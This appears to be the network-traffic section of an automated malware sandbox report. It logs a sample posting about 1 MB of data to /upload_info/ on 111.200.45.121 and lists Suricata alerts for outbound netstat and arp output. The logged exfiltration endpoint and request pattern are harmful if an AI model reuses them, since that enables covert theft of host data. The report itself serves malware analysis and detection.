Network Analysis
| IP Address | Status | Action |
|---|---|---|
| 111.200.45.121 | Active | Moloch |
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| No hosts contacted. | ||
- TCP Requests
POST
200
http://111.200.45.121:80/upload_info/
REQUEST
RESPONSE
BODY
POST /upload_info/ HTTP/1.1
Host: 111.200.45.121:80
User-Agent: Go-http-client/1.1
Content-Length: 994698
Content-Type: multipart/form-data; boundary=51535d488b3886769b89668d177bec9d3929adff1758e9e2854df67b6dc9
Accept-Encoding: gzip
HTTP/1.1 200 OK
Server: nginx/1.9.9
Date: Sun, 29 Aug 2021 03:42:11 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.102:49170 -> 111.200.45.121:80 | 2024897 | ET USER_AGENTS Go HTTP Client User-Agent | Misc activity |
| TCP 192.168.56.102:49170 -> 111.200.45.121:80 | 2019003 | ET MALWARE Windows netstat Microsoft Windows DOS prompt command exit OUTBOUND | A Network Trojan was detected |
| TCP 192.168.56.102:49170 -> 111.200.45.121:80 | 2019080 | ET MALWARE Windows arp -a Microsoft Windows DOS prompt command exit OUTBOUND | A Network Trojan was detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts